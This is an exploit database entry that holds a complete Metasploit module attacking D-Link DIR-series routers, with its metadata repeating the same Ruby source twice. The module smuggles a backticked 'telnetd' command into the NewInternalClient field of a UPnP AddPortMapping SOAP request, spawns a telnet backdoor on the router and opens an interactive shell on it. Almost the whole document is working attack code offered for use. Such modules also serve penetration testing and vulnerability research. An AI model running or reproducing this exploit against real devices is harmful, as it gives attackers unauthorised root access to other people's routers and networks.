ID 1337DAY-ID-21237 Type zdt Reporter metasploit Modified 2013-09-17T00:00:00
Description
Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. This Metasploit module has been tested successfully on DIR-300, DIR-600, DIR-645, DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices may be affected.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Devices UPnP SOAP Telnetd Command Execution',
'Description' => %q{
Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
interface. This module has been tested successfully on DIR-300, DIR-600, DIR-645,
DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices
may be affected.
},
'Author' =>
[
'Michael Messner <[email protected]>', # Vulnerability discovery and Metasploit module
'juan vazquez' # minor help with msf module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '94924' ],
[ 'BID', '61005' ],
[ 'EDB', '26664' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ]
],
'DisclosureDate' => 'Jul 05 2013',
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(49152) #port of UPnP SOAP webinterface
], self.class)
register_advanced_options(
[
OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
], self.class)
end
def tel_timeout
(datastore['TelnetTimeout'] || 10).to_i
end
def banner_timeout
(datastore['TelnetBannerTimeout'] || 25).to_i
end
def exploit
@new_portmapping_descr = rand_text_alpha(8)
@new_external_port = rand(65535)
@new_internal_port = rand(65535)
telnetport = rand(65535)
vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
cmd = "telnetd -p #{telnetport}"
type = "add"
res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end
type = "delete"
res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end
print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
if sock.nil?
fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
end
print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
prompt = negotiate_telnet(sock)
if prompt.nil?
sock.close
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
else
print_good("#{rhost}:#{rport} - Telnet session successfully established...")
end
handler(sock)
end
def request(cmd, type)
uri = '/soap.cgi'
data_cmd = "<?xml version=\"1.0\"?>"
data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
data_cmd << "<SOAP-ENV:Body>"
if type == "add"
vprint_status("#{rhost}:#{rport} - adding portmapping")
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
data_cmd << "<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>"
data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
data_cmd << "<NewEnabled>1</NewEnabled>"
data_cmd << "<NewExternalPort>#{@new_external_port}</NewExternalPort>"
data_cmd << "<NewRemoteHost></NewRemoteHost>"
data_cmd << "<NewProtocol>TCP</NewProtocol>"
data_cmd << "<NewInternalPort>#{@new_internal_port}</NewInternalPort>"
data_cmd << "</m:AddPortMapping>"
else
#we should clean it up ... otherwise we are not able to exploit it multiple times
vprint_status("#{rhost}:#{rport} - deleting portmapping")
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
data_cmd << "</m:DeletePortMapping>"
end
data_cmd << "</SOAP-ENV:Body>"
data_cmd << "</SOAP-ENV:Envelope>"
begin
res = send_request_cgi({
'uri' => uri,
'vars_get' => {
'service' => 'WANIPConn1'
},
'ctype' => "text/xml",
'method' => 'POST',
'headers' => {
'SOAPAction' => soapaction,
},
'data' => data_cmd
})
return res
rescue ::Rex::ConnectionError
fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
end
end
def negotiate_telnet(sock)
begin
Timeout.timeout(banner_timeout) do
while(true)
data = sock.get_once(-1, tel_timeout)
return nil if not data or data.length == 0
if data =~ /\x23\x20$/
return true
end
end
end
rescue ::Timeout::Error
return nil
end
end
end
# 0day.today [2018-02-05] #
{"published": "2013-09-17T00:00:00", "id": "1337DAY-ID-21237", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T01:31:10", "bulletin": {"published": "2013-09-17T00:00:00", "id": "1337DAY-ID-21237", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.1, "modified": "2016-04-19T01:31:10"}}, "hash": "9de592a4b8e67f9f1d80fe234d58e2d6604410b0b0e30c82fe868c36fb0b0f53", "description": "Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. This Metasploit module has been tested successfully on DIR-300, DIR-600, DIR-645, DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices may be affected.", "type": "zdt", "lastseen": "2016-04-19T01:31:10", "edition": 1, "title": "D-Link Devices UPnP SOAP Telnetd Command Execution", "href": "http://0day.today/exploit/description/21237", "modified": "2013-09-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/21237", "references": [], "reporter": "metasploit", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'D-Link Devices UPnP SOAP Telnetd Command Execution',\r\n 'Description' => %q{\r\n Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP\r\n interface. This module has been tested successfully on DIR-300, DIR-600, DIR-645,\r\n DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices\r\n may be affected.\r\n },\r\n 'Author' =>\r\n [\r\n 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module\r\n 'juan vazquez' # minor help with msf module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'OSVDB', '94924' ],\r\n [ 'BID', '61005' ],\r\n [ 'EDB', '26664' ],\r\n [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ]\r\n ],\r\n 'DisclosureDate' => 'Jul 05 2013',\r\n 'Privileged' => true,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' =>\r\n {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd_interact',\r\n 'ConnectionType' => 'find',\r\n },\r\n },\r\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', { } ],\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(49152) #port of UPnP SOAP webinterface\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),\r\n OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])\r\n ], self.class)\r\n end\r\n\r\n def tel_timeout\r\n (datastore['TelnetTimeout'] || 10).to_i\r\n end\r\n\r\n def banner_timeout\r\n (datastore['TelnetBannerTimeout'] || 25).to_i\r\n end\r\n\r\n def exploit\r\n @new_portmapping_descr = rand_text_alpha(8)\r\n @new_external_port = rand(65535)\r\n @new_internal_port = rand(65535)\r\n telnetport = rand(65535)\r\n\r\n vprint_status(\"#{rhost}:#{rport} - Telnetport: #{telnetport}\")\r\n\r\n cmd = \"telnetd -p #{telnetport}\"\r\n type = \"add\"\r\n res = request(cmd, type)\r\n if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\\,\\ UPnP\\/1.0,\\ DIR/)\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to execute payload\")\r\n end\r\n type = \"delete\"\r\n res = request(cmd, type)\r\n if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\\,\\ UPnP\\/1.0,\\ DIR/)\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to execute payload\")\r\n end\r\n\r\n print_status(\"#{rhost}:#{rport} - Trying to establish a telnet connection...\")\r\n sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })\r\n\r\n if sock.nil?\r\n fail_with(Exploit::Failure::Unreachable, \"#{rhost}:#{rport} - Backdoor service has not been spawned!!!\")\r\n end\r\n\r\n print_status(\"#{rhost}:#{rport} - Trying to establish a telnet session...\")\r\n prompt = negotiate_telnet(sock)\r\n if prompt.nil?\r\n sock.close\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to establish a telnet session\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Telnet session successfully established...\")\r\n end\r\n\r\n handler(sock)\r\n end\r\n\r\n def request(cmd, type)\r\n\r\n uri = '/soap.cgi'\r\n\r\n data_cmd = \"<?xml version=\\\"1.0\\\"?>\"\r\n data_cmd << \"<SOAP-ENV:Envelope xmlns:SOAP-ENV=\\\"http://schemas.xmlsoap.org/soap/envelope\\\" SOAP-ENV:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\">\"\r\n data_cmd << \"<SOAP-ENV:Body>\"\r\n\r\n if type == \"add\"\r\n vprint_status(\"#{rhost}:#{rport} - adding portmapping\")\r\n\r\n soapaction = \"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"\r\n\r\n data_cmd << \"<m:AddPortMapping xmlns:m=\\\"urn:schemas-upnp-org:service:WANIPConnection:1\\\">\"\r\n data_cmd << \"<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>\"\r\n data_cmd << \"<NewLeaseDuration></NewLeaseDuration>\"\r\n data_cmd << \"<NewInternalClient>`#{cmd}`</NewInternalClient>\"\r\n data_cmd << \"<NewEnabled>1</NewEnabled>\"\r\n data_cmd << \"<NewExternalPort>#{@new_external_port}</NewExternalPort>\"\r\n data_cmd << \"<NewRemoteHost></NewRemoteHost>\"\r\n data_cmd << \"<NewProtocol>TCP</NewProtocol>\"\r\n data_cmd << \"<NewInternalPort>#{@new_internal_port}</NewInternalPort>\"\r\n data_cmd << \"</m:AddPortMapping>\"\r\n else\r\n #we should clean it up ... otherwise we are not able to exploit it multiple times\r\n vprint_status(\"#{rhost}:#{rport} - deleting portmapping\")\r\n soapaction = \"urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping\"\r\n\r\n data_cmd << \"<m:DeletePortMapping xmlns:m=\\\"urn:schemas-upnp-org:service:WANIPConnection:1\\\">\"\r\n data_cmd << \"<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>\"\r\n data_cmd << \"</m:DeletePortMapping>\"\r\n end\r\n\r\n data_cmd << \"</SOAP-ENV:Body>\"\r\n data_cmd << \"</SOAP-ENV:Envelope>\"\r\n\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'vars_get' => {\r\n 'service' => 'WANIPConn1'\r\n },\r\n 'ctype' => \"text/xml\",\r\n 'method' => 'POST',\r\n 'headers' => {\r\n 'SOAPAction' => soapaction,\r\n },\r\n 'data' => data_cmd\r\n })\r\n return res\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{rhost}:#{rport} - Failed to connect to the web server\")\r\n end\r\n end\r\n\r\n def negotiate_telnet(sock)\r\n begin\r\n Timeout.timeout(banner_timeout) do\r\n while(true)\r\n data = sock.get_once(-1, tel_timeout)\r\n return nil if not data or data.length == 0\r\n if data =~ /\\x23\\x20$/\r\n return true\r\n end\r\n end\r\n end\r\n rescue ::Timeout::Error\r\n return nil\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "002c9e0db9b2fff76a87cd0a426e4d86", "key": "published"}, {"hash": "548f59ce8914478e984445a7e84be349", "key": "sourceData"}, {"hash": "51b0debb46dce75895deec2dbe98fbc8", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "c998f47cfab3fd7f2cfb63e6f189fb21", "key": "title"}, {"hash": "0aea3add77f12492638724f4d7b4efde", "key": "href"}, {"hash": "4f3220e4d9dc865db8a0ccba455c08f9", "key": "sourceHref"}, {"hash": "002c9e0db9b2fff76a87cd0a426e4d86", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. This Metasploit module has been tested successfully on DIR-300, DIR-600, DIR-645, DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices may be affected.", "hash": "6e19b9068a321d11664deb8291393160b2a283581bcfdce88c739fce0beaa91d", "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-02-05T03:14:46", "edition": 2, "title": "D-Link Devices UPnP SOAP Telnetd Command Execution", "href": "https://0day.today/exploit/description/21237", "modified": "2013-09-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "https://0day.today/exploit/21237", "references": [], "reporter": "metasploit", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'D-Link Devices UPnP SOAP Telnetd Command Execution',\r\n 'Description' => %q{\r\n Various D-Link Routers are vulnerable to OS command injection in the UPnP SOAP\r\n interface. This module has been tested successfully on DIR-300, DIR-600, DIR-645,\r\n DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices\r\n may be affected.\r\n },\r\n 'Author' =>\r\n [\r\n 'Michael Messner <[email\u00a0protected]>', # Vulnerability discovery and Metasploit module\r\n 'juan vazquez' # minor help with msf module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'OSVDB', '94924' ],\r\n [ 'BID', '61005' ],\r\n [ 'EDB', '26664' ],\r\n [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ]\r\n ],\r\n 'DisclosureDate' => 'Jul 05 2013',\r\n 'Privileged' => true,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' =>\r\n {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd_interact',\r\n 'ConnectionType' => 'find',\r\n },\r\n },\r\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', { } ],\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(49152) #port of UPnP SOAP webinterface\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),\r\n OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])\r\n ], self.class)\r\n end\r\n\r\n def tel_timeout\r\n (datastore['TelnetTimeout'] || 10).to_i\r\n end\r\n\r\n def banner_timeout\r\n (datastore['TelnetBannerTimeout'] || 25).to_i\r\n end\r\n\r\n def exploit\r\n @new_portmapping_descr = rand_text_alpha(8)\r\n @new_external_port = rand(65535)\r\n @new_internal_port = rand(65535)\r\n telnetport = rand(65535)\r\n\r\n vprint_status(\"#{rhost}:#{rport} - Telnetport: #{telnetport}\")\r\n\r\n cmd = \"telnetd -p #{telnetport}\"\r\n type = \"add\"\r\n res = request(cmd, type)\r\n if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\\,\\ UPnP\\/1.0,\\ DIR/)\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to execute payload\")\r\n end\r\n type = \"delete\"\r\n res = request(cmd, type)\r\n if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\\,\\ UPnP\\/1.0,\\ DIR/)\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to execute payload\")\r\n end\r\n\r\n print_status(\"#{rhost}:#{rport} - Trying to establish a telnet connection...\")\r\n sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })\r\n\r\n if sock.nil?\r\n fail_with(Exploit::Failure::Unreachable, \"#{rhost}:#{rport} - Backdoor service has not been spawned!!!\")\r\n end\r\n\r\n print_status(\"#{rhost}:#{rport} - Trying to establish a telnet session...\")\r\n prompt = negotiate_telnet(sock)\r\n if prompt.nil?\r\n sock.close\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Unable to establish a telnet session\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Telnet session successfully established...\")\r\n end\r\n\r\n handler(sock)\r\n end\r\n\r\n def request(cmd, type)\r\n\r\n uri = '/soap.cgi'\r\n\r\n data_cmd = \"<?xml version=\\\"1.0\\\"?>\"\r\n data_cmd << \"<SOAP-ENV:Envelope xmlns:SOAP-ENV=\\\"http://schemas.xmlsoap.org/soap/envelope\\\" SOAP-ENV:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\">\"\r\n data_cmd << \"<SOAP-ENV:Body>\"\r\n\r\n if type == \"add\"\r\n vprint_status(\"#{rhost}:#{rport} - adding portmapping\")\r\n\r\n soapaction = \"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"\r\n\r\n data_cmd << \"<m:AddPortMapping xmlns:m=\\\"urn:schemas-upnp-org:service:WANIPConnection:1\\\">\"\r\n data_cmd << \"<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>\"\r\n data_cmd << \"<NewLeaseDuration></NewLeaseDuration>\"\r\n data_cmd << \"<NewInternalClient>`#{cmd}`</NewInternalClient>\"\r\n data_cmd << \"<NewEnabled>1</NewEnabled>\"\r\n data_cmd << \"<NewExternalPort>#{@new_external_port}</NewExternalPort>\"\r\n data_cmd << \"<NewRemoteHost></NewRemoteHost>\"\r\n data_cmd << \"<NewProtocol>TCP</NewProtocol>\"\r\n data_cmd << \"<NewInternalPort>#{@new_internal_port}</NewInternalPort>\"\r\n data_cmd << \"</m:AddPortMapping>\"\r\n else\r\n #we should clean it up ... otherwise we are not able to exploit it multiple times\r\n vprint_status(\"#{rhost}:#{rport} - deleting portmapping\")\r\n soapaction = \"urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping\"\r\n\r\n data_cmd << \"<m:DeletePortMapping xmlns:m=\\\"urn:schemas-upnp-org:service:WANIPConnection:1\\\">\"\r\n data_cmd << \"<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>\"\r\n data_cmd << \"</m:DeletePortMapping>\"\r\n end\r\n\r\n data_cmd << \"</SOAP-ENV:Body>\"\r\n data_cmd << \"</SOAP-ENV:Envelope>\"\r\n\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'vars_get' => {\r\n 'service' => 'WANIPConn1'\r\n },\r\n 'ctype' => \"text/xml\",\r\n 'method' => 'POST',\r\n 'headers' => {\r\n 'SOAPAction' => soapaction,\r\n },\r\n 'data' => data_cmd\r\n })\r\n return res\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{rhost}:#{rport} - Failed to connect to the web server\")\r\n end\r\n end\r\n\r\n def negotiate_telnet(sock)\r\n begin\r\n Timeout.timeout(banner_timeout) do\r\n while(true)\r\n data = sock.get_once(-1, tel_timeout)\r\n return nil if not data or data.length == 0\r\n if data =~ /\\x23\\x20$/\r\n return true\r\n end\r\n end\r\n end\r\n rescue ::Timeout::Error\r\n return nil\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-02-05] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "51b0debb46dce75895deec2dbe98fbc8", "key": "description"}, {"hash": "7b0bfcf55b57223fb4b12bdcd5fa5464", "key": "href"}, {"hash": "002c9e0db9b2fff76a87cd0a426e4d86", "key": "modified"}, {"hash": "002c9e0db9b2fff76a87cd0a426e4d86", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "cc64b6ce5cd90b774f74cc0c23e48f3c", "key": "sourceData"}, {"hash": "f3bd10000c3dedcf7f88e2e2449e7497", "key": "sourceHref"}, {"hash": "c998f47cfab3fd7f2cfb63e6f189fb21", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
